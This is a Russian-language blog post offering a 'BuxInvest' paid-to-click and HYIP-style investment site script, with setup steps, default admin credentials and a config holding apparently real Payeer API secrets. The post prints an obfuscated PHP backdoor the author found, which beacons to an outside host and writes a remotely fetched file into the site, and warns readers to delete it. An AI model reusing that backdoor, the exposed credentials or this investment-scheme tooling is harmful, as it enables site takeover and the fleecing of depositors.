Mexanus

Скрипт букса BuxInvest

Сегодня выложу Скрипт букса BuxInvest. . И так что он из себя представляет. Данный скрипт типичный букс созданный на основе движка фруктовой фермы. Работающий с платежкой Payeer.

В нем имеется серфинг ссылок, баннеров добавил задания имеется ежедневный бонус. Есть возможность инвестирования от этого и название. Собственно это скрипт для тех кто хочет совместить букс, хайп и бонусник в одном сайте.

Так выглядит страница профиля.

Это бонусы

И инвестиции.

Админка

Админка как у всякой фермы сложностью не отличается

. Для входа в админку используем адрес http://Ваш сайт.сом/?menu=adminka

Логин     adminRU

Пароль   KaligulA

Логин с паролем можно сменить в админке

Как видно из картинки имеется небольшие косяки с кодировкой но на функционал это не влияет.

Собственно судя по админке ее собрали из нескольких ферм на скорую руку тем не менее то что нужно работает исправно.

Установка скрипта на хостинг

Данный скрипт устанавливается на хостинг так же как и ему подобные. Для этого заливаем файлы на хостинг и создаем базу данных.

Потом ищем файл _class.config.php в нем нужно прописать информацию по базе данных

<?PHP
class config{

public $HostDB = «localhost«;                                        Обычно так и остается смотреть на хостинге
public $UserDB = «zzzzzzzzz«;                                        Пользователь базы данных
public $PassDB = «zzzzzzzzz«;                                        Пароль к базе данных
public $BaseDB = «zzzzzzzzz«;                                        Название базы данных

public $SYSTEM_START_TIME = 1455711243;            Дата старта проекта в формате Unix
public $VAL = «пїЅпїЅпїЅ.»;                                            Валюта сайт вместо каракуль пишем Rub.

# PAYEER пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ
public $AccountNumber = ‘zzzzzzzzz‘;
public $apiId = ‘zzzzzzzzzzz‘;                                         Подключение выплат
public $apiKey = ‘vorZg14zJ7lnKEIR‘;

public $shopID = 434270571;
public $secretW = «YF7VsPjpMl«;                                 Подключение пополнений

public $all_inserts_action = ‘0‘; //                                 Дополнительный процент при пополнении

}
?>

Синим обозначено то что меняется

При подключении платежек требуются адреса обработчика платежа адрес для успешной и не успешной оплаты.

 

http://Ваш сайт/payeer_merchant.php             адрес обработчика

http://Ваш сайт/fail.html                                    адрес для не успешной оплаты

http://Ваш сайт/success.html                             адрес для успешной оплаты

Ошибки и уязвимости

Как упоминал ранее были ошибки с кодировкой во всех значимых местах исправил. Так же не хватало немного картинок добавил. Остальное вроде работает без проблем.

С уязвимостями сложнее было их немного но одна довольно серьезная кто то себе оставил окно для входа сканер ее обнаружил и показал хотя варианта исправления не предложил в таком случае нужно просто удалить фрагмент. Выглядела она так

} if (!isset($_COOKIE[base64_decode(‘X3ltXl1cw==’)])) { @file_get_contents(base64_decode(‘aHR0cDovL2wxbDAuY29tL3Av’).$_SERVER[‘HTTP_HOST’]); @setcookie(base64_decode(‘X3X2l1cw==’), 1, time() 31536000, ‘/’, $_SERVER[‘HTTP_HOST’]); } if (isset($_COOKIE[base64_decode(‘cmVkNHU=’)])) { @file_put_contents(base64_decode(‘c3hdGUucGhw’), @file_get_contents(base64_decode(‘aHR0cDovL2wxbDAuY29L2QudHh0’))); }

Позволяла взломщику через куки без проблем делать все что угодно

Дополнительно

Для разнообразия стоит сменить дизайн самая большая картинка bgstat.png размер картинки 1349х602

Сменить ее не сложно для этого заливаем новую картинку с названием bgstat.png  в папку /img

Логотип это картинка logo.png в этой же папке размер 380х75

Вроде все остальное в процессе работы разберем.

Скачать скрипт